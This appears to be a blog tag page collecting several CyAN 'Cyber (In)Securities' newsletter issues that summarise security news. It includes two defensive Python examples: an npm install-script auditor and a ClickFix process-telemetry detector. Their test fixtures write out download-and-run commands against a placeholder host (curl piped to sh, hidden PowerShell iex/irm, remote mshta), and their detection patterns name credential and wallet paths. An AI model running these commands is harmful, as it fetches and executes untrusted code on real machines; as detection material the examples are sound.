Tag: risk management

Cyber (In)Securities – Issue 137

Information Security News

1. Oracle Cloud security SNAFU latest: IT giant accused of pedantry as evidence scrubbed
The Register by Thomas Claburn
Read more

2. CoffeeLoader Malware Is Stacked With Vicious Evasion Tricks
Dark Reading by Becky Bracken
Read more

3. Phishing platform ‘Lucid’ behind wave of iOS, Android

Navigating Uncharted Waters: The EU’s Digital Markets Act and Its Impact on Security

The European Union’s Digital Markets Act (DMA) is setting the stage for significant changes in the tech landscape, particularly for companies like Apple, known for their tightly controlled ecosystems. While the DMA aims to enhance competition and consumer choice by opening up platforms like iOS 

Cyber (In)Securities – Issue 125

Information Security News

Joint Letter on the UK Government’s use of Investigatory Powers Act to attack End-to-End Encryption
Global Encryption Coalition by Ryan Polk


The Global Encryption Coalition is actively opposing the UK government’s utilisation of the Investigatory Powers Act to erode end-to-end encryption, asserting that this undermines both personal privacy and national security. An open letter, which is soliciting public signatures until February 20th, has been circulated to garner widespread support against this legislative action. The coalition is urging stakeholders from all sectors to join this campaign, emphasising the critical role of strong encryption in safeguarding secure communications and protecting digital rights against intrusive surveillance.
Read more

US lawmakers press Trump admin to oppose UK’s order for Apple iCloud backdoor
The Register by Brandon Vigliarolo


In a significant stance for digital privacy, US lawmakers are pushing back against the UK’s order, issued under the Investigatory Powers Act, that Apple build a backdoor into its encrypted iCloud services. They argue that complying would compromise the privacy of users worldwide, since a capability built for one government cannot be confined to it, and would set a precedent that other states would invoke. The pushback underscores the ongoing international dispute over encryption and government surveillance, and the balance between national security demands and individual privacy rights. The lawmakers urge the administration to press the UK to withdraw the demand rather than allow such overreach to become the norm.
Read more

Rape under wraps: how Tinder, Hinge and their corporate owner chose profits over safety
The Guardian by Elena Dugdale


A detailed investigative report by The Guardian has unveiled significant safety failures by Tinder and Hinge, exposing how their corporate owner has consistently prioritised profit over user safety, especially in addressing incidents of rape connected to their platforms. This serious oversight has led to widespread outrage and urgent calls for reform in the online dating industry. The report underscores the critical need for immediate implementation of stricter safety measures and regulatory oversight. It advocates for a major overhaul of safety protocols on dating platforms to better protect users from potential harm and to hold companies accountable for their safety practices, thereby ensuring a safer online environment for dating app users.
Read more

The Rise of Cyber Espionage: UAV and C-UAV Technologies as Targets
Security Affairs by Pierluigi Paganini


Unmanned Aerial Vehicles (UAVs) and Counter-Unmanned Aerial Vehicle (C-UAV) systems, pivotal for national defense and commercial industries, are facing an uptick in cyber espionage activities. These advanced technologies, integral to modern warfare and surveillance, have become prime targets for state-sponsored cyberattacks aimed at stealing sensitive data or causing operational disruptions. The growing prevalence of such espionage underscores the urgent need for nations to enhance cybersecurity measures around UAVs, encourage international cooperation on cyber defense strategies, and implement robust protocols to protect these critical technologies from foreign interference, ensuring operational security and technological integrity.
Read more

US Coast Guard Urged to Strengthen Cybersecurity Amid $2B Daily Port Risk
Tripwire by Graham Cluley


In light of increasing cyber threats targeting critical infrastructure, the US Coast Guard is urgently called to strengthen its cybersecurity frameworks. Given the agency’s role in securing ports through which goods worth over $2 billion transit daily, enhancing cyber defences is not just beneficial but essential. The necessity for these improvements comes amid reports of potential vulnerabilities that could be exploited to disrupt commercial and security operations at maritime points. Industry experts are advocating for significant investments in cybersecurity, including updated technologies and training, comprehensive threat assessments, and stronger collaborative measures with other national security agencies to safeguard against the sophisticated nature of current cyber threats.
Read more

North Korea targets crypto developers via NPM supply chain attack
The Register by Connor Jones


In a significant revelation, North Korea has been implicated in a series of cyberattacks targeting cryptocurrency developers through the NPM package manager. This method involves inserting malicious code into software dependencies, which can compromise security and steal sensitive information. These attacks not only demonstrate North Korea’s growing sophistication in cyber warfare but also highlight the vulnerabilities inherent in the software development supply chain. The international community is urged to take immediate action by implementing stricter security protocols for software development, enhancing monitoring mechanisms, and fostering collaboration between nations to counter the risks posed by such state-sponsored cyber activities.
Read more
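
The attack described above works because npm runs a dependency’s lifecycle scripts (preinstall, install, postinstall, prepare) automatically during `npm install`, so a malicious package needs nothing from the developer beyond being installed. The following is an added example, not code from the article or from any npm tool: it walks a node_modules tree, lists every package that declares an install-time hook and flags script bodies that fetch from the network, decode payloads or evaluate code. The package names, versions and commands in `build_fixture()` are constructed for the demonstration, and the regexes are illustrative heuristics rather than a complete detector.

```python
"""Audit an npm dependency tree for install-time lifecycle scripts.

Added example, not code from the article or from any npm tool. The package
names, versions and script commands in build_fixture() are constructed for the
demonstration; the regexes are illustrative heuristics, not a complete detector.
"""
import json
import re
import tempfile
from pathlib import Path

# npm runs these hooks automatically during `npm install`, so a malicious
# dependency needs no help from the victim beyond being installed.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristics for script bodies that warrant a human look (constructed list).
RISKY_PATTERNS = [
    (r"(?i)\bnode\s+-e\b", "inline node script"),
    (r"(?i)\b(curl|wget)\b|https?://", "network fetch"),
    (r"(?i)base64|Buffer\.from\(|atob\(", "encoded payload"),
    (r"(?i)\beval\(|new Function\(", "dynamic code evaluation"),
    (r"(?i)\.ssh\b|id_rsa|wallet|keystore|\.env\b", "credential or wallet path"),
]


def audit_package(pkg_json: Path) -> list:
    """Return one finding per lifecycle hook declared in a package.json."""
    data = json.loads(pkg_json.read_text(encoding="utf-8"))
    scripts = data.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        reasons = [label for rx, label in RISKY_PATTERNS if re.search(rx, command)]
        findings.append({
            "package": data.get("name", pkg_json.parent.name),
            "version": data.get("version", "?"),
            "hook": hook,
            "command": command,
            "reasons": reasons,  # empty means "runs code, but nothing obviously hostile"
        })
    return findings


def audit_node_modules(root: Path) -> list:
    """Walk a node_modules tree (scoped packages included) and collect findings."""
    findings = []
    for pkg_json in sorted(root.rglob("package.json")):
        findings.extend(audit_package(pkg_json))
    return findings


def high_risk(findings: list) -> list:
    """Findings whose script body matched at least one heuristic."""
    return [f for f in findings if f["reasons"]]


def build_fixture() -> Path:
    """Create a constructed node_modules tree in a temp dir for the demo."""
    root = Path(tempfile.mkdtemp()) / "node_modules"
    packages = {
        "left-pad-ish": {"name": "left-pad-ish", "version": "1.0.0"},
        "esbuild-ish": {"name": "esbuild-ish", "version": "0.1.0",
                        "scripts": {"postinstall": "node install.js"}},
        "web3-helpers": {"name": "web3-helpers", "version": "2.3.1",
                         "scripts": {"preinstall":
                                     "node -e \"eval(Buffer.from('aGk=','base64').toString())\""}},
        "@scope/wallet-tools": {"name": "@scope/wallet-tools", "version": "4.0.2",
                                "scripts": {"postinstall": "curl -s https://example.invalid/s | sh"}},
    }
    for folder, manifest in packages.items():
        pkg_dir = root / folder
        pkg_dir.mkdir(parents=True)
        (pkg_dir / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
    return root


if __name__ == "__main__":
    for f in audit_node_modules(build_fixture()):
        flag = "REVIEW" if f["reasons"] else "runs-code"
        print(f"{flag:9} {f['package']}@{f['version']} {f['hook']}: {f['command']} {f['reasons']}")
```

Run it against a real checkout by pointing `audit_node_modules` at the project’s `node_modules` directory. The preventive control that makes the audit far less urgent is `npm ci --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) in CI and on developer machines, re-enabling scripts only for the handful of packages that genuinely need a native build step.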

US woman faces years in federal prison for running laptop farm for N Korean IT workers
Bitdefender by Graham Cluley


A US woman is currently facing federal prison for setting up a ‘laptop farm’ allegedly used to provide illicit technological support to North Korean IT workers, breaching international sanctions. This case underscores significant risks in cybersecurity and international relations, highlighting how individuals can contribute to global security threats through seemingly benign activities. It serves as a stark reminder of the importance of stringent enforcement of cybersecurity laws and international sanctions, ensuring that individuals and companies adhere to global norms and prevent the facilitation of unauthorised state-sponsored cyber operations.
Read more

Japan Goes on Offense With New ‘Active Cyber Defense’ Bill
Dark Reading by Nate Nelson


Japan is taking bold steps to bolster its cybersecurity stance with the proposed ‘Active Cyber Defense’ bill, allowing preemptive measures against imminent cyber threats. This legislative effort reflects a strategic pivot towards a more aggressive defense posture in cyberspace, aimed at thwarting cyberattacks before they can cause harm. The move is part of a larger national security strategy to protect critical digital infrastructure and sensitive data from increasingly sophisticated cyber threats posed by rival nations. With this proactive approach, Japan seeks to set a precedent for cybersecurity, emphasising the need for dynamic defensive capabilities and international cooperation in an era where digital threats are rapidly evolving.
Read more

zkLend loses $9.5M in crypto heist, asks hacker to return 90%
BleepingComputer by Lawrence Abrams


In a daring crypto heist, zkLend lost $9.5 million, leading the platform to unusually request the hacker to return 90% of the stolen funds. This incident spotlights the persistent vulnerabilities within cryptocurrency platforms and the unconventional methods entities might resort to when attempting to mitigate losses. The episode has sparked a broader discussion in the crypto community about the security of decentralised finance (DeFi) platforms, the ethical implications of negotiating with cybercriminals, and the need for more stringent regulatory and security measures to protect investors and maintain the integrity of the crypto market.
Read more

Hacker leaks account data of 12 million Zacks Investment users
BleepingComputer by Bill Toulas


A massive data breach at Zacks Investment resulted in the leak of personal account data for 12 million users, exposing them to potential financial and identity theft risks. This breach underscores the continuing challenges financial institutions face in safeguarding sensitive customer information against increasingly sophisticated cyber attacks. The incident has prompted calls for enhanced cybersecurity protocols, including more robust data encryption and real-time monitoring systems, to prevent future breaches and to bolster consumer confidence in the digital security measures of financial services.
Read more

RA World Ransomware Attack in South Asia Links to Chinese Espionage Toolset
The Hacker News by Ravie Lakshmanan


The RA World ransomware attack in South Asia has been linked to a toolset commonly used in Chinese espionage, suggesting a state-sponsored origin. This connection illuminates the dual-use nature of cyber tools in espionage and commercial cybercrime, highlighting significant geopolitical cybersecurity concerns. The attack not only disrupted numerous systems but also pointed to the intricate ways in which national security and cybercrime intersect. This event calls for a global reevaluation of cyber defense strategies, emphasising the need for international collaboration to address the multifaceted threats posed by state-affiliated cyber actors.
Read more

Trump to nominate Sean Cairncross as national cyber director
Cybersecurity Dive by David Jones


In a significant political move, President Trump announced the nomination of Sean Cairncross as national cyber director, signalling a strategic focus on strengthening national cybersecurity infrastructure. Cairncross, known for his previous governmental roles, is expected to bring a robust approach to coordinating cyber defense across federal agencies. His nomination comes at a time when the U.S. faces escalating cyber threats, highlighting the administration’s stated commitment to bolstering cyber resilience and protecting critical information infrastructure from both domestic and foreign cyber threats.
Read more

CISA Places Election Security Staffers on Leave
Dark Reading by Kristina Beek


The Cybersecurity and Infrastructure Security Agency (CISA) has placed a number of its election security staffers on administrative leave, reportedly pending a review of the agency’s election-related work. The move has alarmed cybersecurity experts and lawmakers, who fear it weakens the support that state and local election officials have relied on CISA for since election systems were designated critical infrastructure in 2017. Critics argue that the timing and lack of transparency surrounding the decision leave the nation’s election infrastructure more exposed to foreign interference and cyberattacks, thereby threatening the democratic process. Calls are intensifying for reinstatement of the staff and for assurances that election security remains a priority, with robust, uninterrupted protection against potential threats.
Read more

Probe finds US Coast Guard has left maritime cybersecurity adrift
The Register by Jessica Lyons


A recent investigation has revealed significant cybersecurity lapses within the US Coast Guard, raising alarms over the potential vulnerability of the United States’ maritime sector to cyber threats. The probe highlights a lack of adequate security measures and preparedness against cyberattacks that could jeopardise critical maritime operations and national security. The findings have prompted urgent calls for comprehensive updates to cybersecurity protocols and for increased funding to bolster the Coast Guard’s capacity to defend against sophisticated cyber threats. Stakeholders are urging swift action to shore up defences and ensure the safety of the maritime transport system.
Read more

Triplestrength hits victims with triple trouble: Ransomware, cloud hijacks, crypto-mining
The Register by Jessica Lyons


Triplestrength, a financially motivated group described in Google’s threat intelligence reporting, combines three money-making lines of business: ransomware against on-premises systems, hijacking of cloud accounts, typically through stolen credentials, and illicit crypto-mining on the hijacked cloud resources. Victims can therefore end up with encrypted data on one side and a very large compute bill on the other, significantly amplifying the operational and financial impact. The breadth of the operation illustrates a growing trend of cybercriminals mixing extortion with resource theft to maximise their return from a single intrusion. Cybersecurity experts recommend a layered defence, including multi-factor authentication on cloud consoles, billing and quota alerts for anomalous compute usage, and tested backups for the ransomware side of the threat.
Read more

Bipartisan Senate bill would strengthen cybercrime penalties
Cyberscoop by Matt Bracken


A bipartisan effort in the US Senate has introduced a bill aimed at significantly strengthening penalties for cybercrimes, reflecting growing legislative focus on combatting cyber threats more aggressively. This bill proposes enhancements to existing laws, including tougher sentences for hackers and more substantial fines for cybercriminal enterprises. The move is seen as a response to the increasing frequency and severity of cyber attacks on national infrastructure and private entities, highlighting the need for a more robust legal framework to deter cybercriminals and protect citizens and businesses from cyber threats.
Read more

Cybersecurity experts fear Elon Musk’s DOGE may enable quantum hackers
NewScientist by Matthew Sparkes


The DOGE in question is Elon Musk’s Department of Government Efficiency, not the Dogecoin cryptocurrency. Cybersecurity experts quoted by New Scientist worry that its disruption of federal agencies and its handling of sensitive government data could undermine the US transition to post-quantum cryptography, the multi-year effort to replace the public-key algorithms that a sufficiently large quantum computer would break. Any delay widens the window for ‘harvest now, decrypt later’ attacks, in which adversaries collect encrypted government data today to decrypt once quantum hardware matures. The experts argue that the migration needs sustained staffing and funding to stay on schedule and to keep government and critical-infrastructure communications secure.
Read more

Russian military hackers deploy malicious Windows activators in Ukraine
BleepingComputer by Sergiu Gatlan


Russia’s GRU-linked Sandworm group has been distributing trojanised Windows and Office activators (pirated ‘KMS’ tools) and fake Windows updates to users in Ukraine. The tools appear to work as advertised but also drop a loader that installs a remote access trojan, giving the attackers persistence and surveillance on the victim’s machine. Because pirated software is widespread in the region, the lure reaches home users as well as staff of government and critical infrastructure organisations, turning a licensing shortcut into an espionage foothold. The campaign is a reminder that unlicensed software bypasses the update and integrity checks defenders rely on, and that international support for Ukraine’s ability to detect and neutralise such covert threats remains important.
Read more

Adobe Plugs 45 Software Security Holes, Warns of Code Execution Risks
SecurityWeek by Ryan Naraine


Adobe has released a critical update to address 45 vulnerabilities across its range of software, which were found to potentially allow malicious code execution if exploited. This sweeping security update underscores the ongoing risks associated with software vulnerabilities and highlights the necessity for continuous vigilance by users and organisations alike. Adobe urges all users to update their software promptly to mitigate the risks of unauthorised access or data breaches. The move also prompts a broader discussion in the tech community about the importance of regular software maintenance and the implementation of proactive security measures to protect against increasingly sophisticated cyber threats.
Read more

SonicWall firewall exploit lets hackers hijack VPN sessions, patch now
BleepingComputer by Bill Toulas


A vulnerability in SonicOS, the firmware on SonicWall firewall appliances, lets an unauthenticated attacker bypass authentication on the SSL VPN component and hijack active VPN sessions, gaining the access of the legitimate user inside the private network. Proof-of-concept exploit code is now public, which is why the advisory urges immediate patching of affected models. Organisations should update the firmware, restrict SSL VPN access to trusted source addresses where feasible, and review VPN session logs for logins from unexpected locations. The incident underscores how network edge devices that terminate remote access are prime targets, and why patch latency on them is a direct exposure.
Read more

Microsoft Patches ‘Wormable’ Windows Flaw and File-Deleting Zero-Day
SecurityWeek by Ryan Naraine


Microsoft’s latest Patch Tuesday fixes a critical remote code execution flaw in the Windows Lightweight Directory Access Protocol (LDAP) service that is rated as potentially wormable, meaning malware could use it to spread between unpatched machines without user interaction, alongside an actively exploited zero-day in Windows Storage that lets a local attacker delete targeted files, a primitive that can be chained into privilege escalation. Domain controllers and other LDAP-exposed servers should be prioritised. The seriousness of these vulnerabilities, particularly the wormable one, highlights the continuous arms race in cybersecurity and the need for prompt patching and user awareness to safeguard personal and organisational data.
Read more

Threat Actors Exploit ClickFix to Deploy NetSupport RAT in Latest Cyber Attacks
The Hacker News by Ravie Lakshmanan


ClickFix is not a software product or a vulnerability but a social-engineering technique: a compromised or malicious web page shows a fake error, CAPTCHA or ‘verify you are human’ prompt and instructs the visitor to fix it by copying a command and pasting it into the Windows Run dialog or a PowerShell window. The pasted command downloads and runs a loader, which in this campaign installs the NetSupport Manager remote-control tool as a RAT, giving the operators control of the host for data theft, surveillance and follow-on activity. Because the victim launches the command themselves, no exploit or macro is needed and many email and browser controls never see a malicious file. Defenders should restrict interactive PowerShell and mshta for ordinary users where possible, alert on script hosts spawned by explorer.exe with download-and-execute or hidden-window arguments, and teach users that no legitimate site asks them to paste commands.
Read more
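
The detection logic the lure described above calls for, as an added example that is not code from the article or from NetSupport or any EDR product: it scores process-creation events, looking for a script host launched from explorer.exe (the parent of anything typed into the Run dialog) with download-and-execute, hidden-window, encoded-command or lure-comment indicators in the command line. The events are constructed, not real telemetry, and use a simplified subset of Sysmon Event ID 1 / Windows 4688 fields; the indicator patterns are heuristics to be tuned against a real baseline.

```python
"""Flag ClickFix-style launches in process-creation telemetry.

Added example, not code from the article or from any EDR product. The events
in SAMPLE_EVENTS are constructed and use a simplified subset of Sysmon Event
ID 1 / Windows 4688 fields; the patterns are heuristics, not a full ruleset.
"""
import re

# Script hosts and download utilities that a pasted lure command typically invokes.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# A command typed into the Run dialog (Win+R) is a child of explorer.exe; that
# parent is rare for admin scripting, which runs from schedulers or agents.
INTERACTIVE_PARENTS = {"explorer.exe"}

COMMAND_INDICATORS = [
    (r"(?i)\biex\b|invoke-expression", "inline expression evaluation"),
    (r"(?i)\birm\b|\biwr\b|invoke-restmethod|invoke-webrequest|downloadstring", "remote fetch"),
    (r"(?i)\s-(w|win|windowstyle)\s+h(idden)?\b", "hidden window"),
    (r"(?i)\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r'(?i)mshta(\.exe)?"?\s+https?://', "mshta with remote HTA"),
    (r"(?i)curl(\.exe)?\s.*\|\s*(cmd|sh|bash|powershell)\b", "curl piped to shell"),
    (r"(?i)\bbypass\b", "execution policy bypass"),
    (r"(?i)#.*(captcha|human|verify|robot)", "lure text appended as a comment"),
]


def _basename(image_path: str) -> str:
    return image_path.strip('"').rsplit("\\", 1)[-1].lower()


def score_event(event: dict):
    """Return a dict describing why the event looks like ClickFix, or None."""
    image = _basename(event["Image"])
    if image not in SCRIPT_HOSTS:
        return None
    command = event["CommandLine"]
    reasons = [label for rx, label in COMMAND_INDICATORS if re.search(rx, command)]
    interactive = _basename(event["ParentImage"]) in INTERACTIVE_PARENTS
    # Alert on an interactive launch with any content indicator, or on two or
    # more content indicators regardless of parent. A lone "-ExecutionPolicy
    # Bypass" from a management agent is normal and must not page anyone.
    if (interactive and reasons) or len(reasons) >= 2:
        if interactive:
            reasons.append("spawned by explorer.exe (Run dialog or pasted command)")
        return {"user": event["User"], "image": image, "reasons": reasons, "command": command}
    return None


def detect(events: list) -> list:
    """Score every event and return the hits with their position in the input."""
    hits = []
    for index, event in enumerate(events):
        hit = score_event(event)
        if hit:
            hit["index"] = index
            hits.append(hit)
    return hits


SAMPLE_EVENTS = [  # constructed telemetry, not from a real host
    {"User": "CORP\\jdoe", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iex (irm https://example.invalid/v)" # I am not a robot - reCAPTCHA Verification ID: 7624'},
    {"User": "CORP\\jdoe", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta https://example.invalid/verify.hta"},
    {"User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Windows\CCM\CcmExec.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\inventory.ps1"},
    {"User": "CORP\\asmith", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'},
    {"User": "CORP\\bnguyen", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd /c "curl -s https://example.invalid/s | cmd"'},
]


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"[{hit['index']}] {hit['user']} {hit['image']}: {', '.join(hit['reasons'])}")
```

Events 0, 1 and 4 alert; event 2 (a management agent running a script with an execution-policy bypass) and event 3 (a user simply opening a PowerShell prompt) do not, which is the false-positive boundary a real rule has to hold. The same indicators can be applied to the RunMRU registry key, which records what users have typed into the Run dialog.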

OpenAI Finds No Evidence of Breach After Hacker Offers to Sell 20 Million Credentials
SecurityWeek by Eduard Kovacs


In a recent security scare, a hacker claimed to have access to 20 million user credentials from OpenAI services. However, after thorough investigations, OpenAI announced that they found no evidence of a data breach, attributing the claim possibly to previously compromised data from other sources. This incident has heightened awareness around data security, prompting OpenAI to reassure users of their stringent security measures and encourage stronger password practices and multi-factor authentication. It also serves as a reminder for all organisations to continually assess and update their security protocols to protect against evolving cyber threats.
Read more

iOS 18.3.1 patches an ‘extremely sophisticated attack’ – and more
ZDNet by Adrian Kingsley-Hughes


Apple has released iOS 18.3.1 and iPadOS 18.3.1 to fix a flaw that it says may have been exploited in an ‘extremely sophisticated attack’ against specific targeted individuals. The bug is an authorisation issue that could let an attacker with physical access to a locked device disable USB Restricted Mode, the protection that blocks data connections over the port until the device is unlocked; it is the kind of weakness used by forensic extraction tools rather than by remote malware. Users should install the update promptly, and organisations that manage fleets should push it through their device management tooling. Apple’s swift response highlights the ongoing arms race between platform vendors and the exploit trade, and the importance of regular software updates in maintaining security and user trust.
Read more

Medibank link emerges in multi-country action against ZServers
itNews by Eleanor Dickinson


Sanctions designations announced by Australia, the US and the UK against the bulletproof hosting provider ZServers note that its infrastructure was used by the criminals behind the 2022 Medibank breach, one of Australia’s most damaging data thefts, as well as by LockBit ransomware affiliates. The link illustrates how bulletproof hosters supply the servers that ransomware and extortion crews depend on, and why acting against that layer can disrupt several criminal operations at once. The coordinated action reflects a growing pattern of cross-border measures aimed at criminal infrastructure rather than only at individual operators, alongside the ongoing need for organisations to harden their own networks against the intrusions such infrastructure enables.
Read more

VeraCore zero-day vulnerabilities exploited in supply chain attacks
Cybersecurity Dive by Rob Wright


Two zero-day vulnerabilities in VeraCore, a warehouse management and order fulfilment platform used by manufacturers and distributors, have been exploited by the XE Group, a threat actor that has maintained long-term access to victims by planting web shells. The attackers used the bugs to break into logistics and manufacturing networks, putting those companies’ customers and supply chains at risk. The incident has prompted calls for software vendors to run comprehensive vulnerability management programmes, and for customers to assess exposed business applications regularly and hunt for web shells rather than assume that a patch alone evicts an intruder who is already inside.
Read more

Australia, US, UK target ZServers over Lockbit ransomware attacks
itNews


In a significant international law enforcement effort, agencies from Australia, the US and the UK have imposed coordinated sanctions on ZServers, a Russia-based bulletproof hosting provider that supplied infrastructure for LockBit ransomware attacks. The joint action reflects a robust global stance against the service providers who enable cybercriminals to disrupt and extort businesses and government agencies worldwide. By targeting a key node in the ransomware ecosystem, the operation aims to disrupt criminal operations, enhance global cybersecurity resilience and set a precedent for future international cooperation against digital threats.
Read more

ANALYSIS

How Public & Private Sectors Can Better Align Cyber Defense
Dark Reading by Chris Henderson


The necessity for improved alignment between public and private sectors in cyber defense strategies is becoming increasingly critical as cyber threats evolve. This article explores this topic, advocating for a more integrated approach where governmental agencies and private companies share intelligence, tools, and strategies to combat cyber threats effectively. It goes on to suggest establishing formal frameworks and partnerships that facilitate real-time data exchange and collaborative response mechanisms. Such integration is intended to enhance the overall security posture of both sectors, enabling more agile and effective responses to cyber incidents and reducing the impact of breaches.
Read more

3 Ways Nonprofits Can Strengthen Their Cybersecurity in 2025
Biz Tech by Matt Morgan


As nonprofits become increasingly reliant on digital technologies, ‘Biz Tech’ outlines three strategic ways these organisations can enhance their cybersecurity in 2025. First, adopting a tailored cybersecurity framework that addresses specific vulnerabilities unique to the nonprofit sector. Second, investing in comprehensive staff training to recognise and respond to cyber threats proactively. Third, forming partnerships with technology firms to access cutting-edge security tools at reduced costs. These measures are crucial for safeguarding sensitive data, maintaining donor trust, and ensuring the continuity of services amidst a landscape of escalating cyber risks.
Read more

Top cybersecurity trends to watch in 2025
JP Morgan


JP Morgan’s report on the top cybersecurity trends for 2025 provides crucial insights for organisations aiming to stay ahead of emerging threats. Highlighting the integration of artificial intelligence in threat detection and response, the expansion of data privacy regulations, and the adoption of zero-trust security architectures, the report emphasises the need for businesses to adapt swiftly. These trends are expected to define the cybersecurity landscape, necessitating strategic adjustments in corporate security policies and IT infrastructures to mitigate risks and comply with new regulatory requirements effectively.
Read more

WTF? Why the cybersecurity sector is overrun with acronyms
CSO Australia by Lee-Anne Goodman


CSO Australia critically examines the pervasive use of acronyms within the cybersecurity sector, arguing that this jargon complicates communication and can alienate newcomers or non-specialists. The article calls for a paradigm shift towards clearer, more accessible language that facilitates understanding and collaboration across diverse stakeholders. By standardising terminology and simplifying explanations, the cybersecurity community can enhance operational efficiency, improve stakeholder engagement, and foster a more inclusive environment that attracts a broader range of talent and expertise.
Read more

How fake security reports are swamping open-source projects, thanks to AI
ZDNet by Steven Vaughan-Nichols


ZDNet explores a troubling trend where artificial intelligence is being used to generate fake security reports, overwhelming open-source projects with fraudulent vulnerability claims. Steven Vaughan-Nichols details how these AI-generated reports, which often appear technically plausible, can deceive project maintainers, leading to unnecessary alarms and wasted resources. This surge in fake reports not only strains the open-source community but also risks undermining trust in genuine security warnings. The article calls for enhanced verification processes and AI detection tools to combat this new form of cyber deception, urging the community to develop strategies to distinguish between legitimate and AI-generated reports to maintain the integrity of open-source software development.
Read more

Protecting Your Software Supply Chain: Assessing the Risks Before Deployment
The Hacker News


The importance of securing the software supply chain has never been more critical, as highlighted in a comprehensive analysis by The Hacker News. This article details strategies for assessing and mitigating risks before software deployment, emphasising the need for rigorous security audits and vulnerability assessments throughout the development lifecycle. By integrating these practices, companies can prevent the infiltration of malicious code and unauthorised access, safeguarding their operations from the ground up. The piece advocates for a holistic approach, combining technology solutions with staff training and robust policy frameworks to create a resilient defense against evolving cyber threats.
Read more

Zero Trust: Redefining cybersecurity for the modern era
Intelligent CISO by Alasdair Anderson


Intelligent CISO delves into the Zero Trust security model, advocating for its adoption as the foundation for modern cybersecurity strategies. This approach, which assumes that threats could be internal as well as external, requires verification at every step of digital interactions, fundamentally changing how organisations secure their IT environments. The article explains how Zero Trust architectures can prevent data breaches by continuously authenticating user identities and access rights, thereby minimising the risk of insider threats and external attacks. Implementing Zero Trust not only enhances security but also aligns with evolving regulatory landscapes and technological advancements.
Read more

Major Cyber Attacks in Review: January 2025
SOC Radar


SOC Radar’s report on major cyber attacks in January 2025 provides a sobering overview of the cybersecurity challenges faced globally. It details significant incidents that have impacted government agencies, enterprises, and non-profits, illustrating the sophisticated tactics used by cybercriminals. The analysis stresses the urgency for organisations to adopt proactive defense strategies, such as advanced threat detection systems and incident response plans, to mitigate the impacts of such attacks. The report serves as a call to action for heightened vigilance and strategic planning in the face of the dynamic and persistent threat landscape.
Read more

CyAN Members: Op Eds, Articles, etc:

Your Browser’s Betrayal: Understanding Syncjacking Attacks
Kim Chandler McDonald


In an insightful piece by CyAN Global VP Kim Chandler McDonald, the concept of ‘syncjacking,’ a new form of cyber attack that exploits browser synchronisation features to steal personal information, is thoroughly examined. This article explores how attackers manipulate synced data across devices to gain unauthorised access to sensitive information, compromising user privacy and security. McDonald provides practical advice on how to protect oneself from such attacks, including the use of more secure synchronisation methods and regular audits of sync settings. The piece highlights the need for continuous education on emerging cyber threats to keep personal and organisational data safe.
Read more

CyAN Members: News

  • CyAN board member Gergely Dzsinich will discuss global privacy law and cyber topics affecting the EU, the USA, and China at the International Air Transport Association (IATA) World Legal Symposium in Shanghai, 18-20 February. His talk will specifically address issues like data transfers and the unique topic of biometrics.
  • CyAN Member Yedhu Krishna Menon will be presenting on the topic of “Future of Cybersecurity in Nth Party Supply Chain” — exploring the importance of Collaborative Defense in managing security risks across extended supply chains at the Third-Party Risk Management (TPRM) Conference in Riyadh, Saudi Arabia, on May 7th and 8th!
    More info

Upcoming CyAN Global Events:

  • Breaking the Cycle: Combating Online IBSA for a Safer Digital Experience – Webinar, March 6th (EST 6AM, CET 12PM, AEST 10PM)
    Read more
  • CyAN APAC: The Geopolitical Impacts of Cyber Threats: From Espionage to Influence – Keynote by Dan Elliot, March 12, Peoplebank, Sydney (save the date, general release tickets available soon!)
  • GITEX AFRICA, Marrakesh, Morocco: 14-16 April
    Read more
  • GITEX ASIA, Singapore (Marina Bay Sands): 23-25 April
    Read more
  • GISEC, Dubai World Trade Centre, Dubai, UAE: 6th to 8th May
    Read more
  • The Cyber Outstanding Security Performance Awards (Cyber OSPAs), May 8, London, UK
    Read more
  • MaTeCC, Rabat, Morocco: 7-9 June, 2025 (The third annual North Africa and beyond cybersecurity event, hosted by CyAN partner organisation École High-Tech.)
    Read more

Cyber (In)Securities – Issue 121

Information Security News

US Cyber Agency’s Future Role in Elections Remains Murky Under the Trump Administration
Security Week via Associated Press

The role of the US Cybersecurity and Infrastructure Security Agency (CISA) in safeguarding elections is increasingly uncertain under the Trump administration. While CISA played a

Faking GitHub Commits – What Could Go Wrong?

Found: a tool creating dummy GitHub source code commits to help programmers game job evaluation mechanisms. This illustrates a deeper issue with how badly designed incentives can have serious security consequences.

Some Quick Thoughts on the Crowdstrike “Issue”

Note: these are purely my opinions, not those of CyAN or any of my clients.

Last week, security vendor CrowdStrike pushed a content update for its Falcon EDR (Endpoint Detection and Response) agent to millions of systems running Microsoft Windows. A faulty “channel file” in that update caused the kernel-mode sensor to fault, so affected hosts crashed with a “blue screen of death” and frequently boot-looped, leading to major impact across multiple critical industries: Windows virtual machines on Microsoft Azure were hit, multiple airlines suspended flights and hospital operations were slowed, while IT operations teams scrambled to remove the file, often by hand across thousands of machines. Microsoft has since issued a recovery tool.

Fellow CyAN member, and member of the governing board, Kim Chandler McDonald, recently posted an article on her LinkedIn feed about the dangers of software monoculture, with parallels to risks from monocultures in nature. Kim also shares recommendations for good practices on mitigating monoculture risks in the first place – as with all of her pieces, it’s worth a read.

